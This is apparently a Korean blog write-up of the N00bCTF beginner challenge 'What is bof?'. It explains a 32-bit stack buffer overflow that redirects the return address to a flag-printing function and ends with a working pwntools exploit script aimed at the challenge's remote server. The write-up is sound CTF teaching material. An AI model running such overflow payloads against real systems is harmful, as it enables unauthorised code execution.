1) What is bof? (100) BOF가 뭔지 물어보는 기본적인 문제이다. 우선 32bit 리눅스 실행 파일이 주어진다. 메모리 보호기법에는 NX 활성화, Partial Relro 외에 특별한 기법은 없다. (기본 문제라 그런가 보다.) 쉘 코드를 사용할 수 없으므로 바이너리 내에 호출할 수 있는 함수가 있을 것이다. (실제로 존재, flag = 0x08048516) Buffer(20) + SFP(4) + RET(0x08048516) 페이로드가 완성 되었다. // pwn1.py from pwn import * p = remote("52.79.224.215", 30005) p.recvuntil(">> ") payload = "\x90"*24 payload += p32(0x08048516) p.sendline(payload) p.interactive()...
#bof
#워게임
#wargame
#pwnable
#pwn
#overflow
#n00bctf
#ctf
#buffer
#포너블
원문링크 : [Pwn] N00bCTF Pwn What is bof?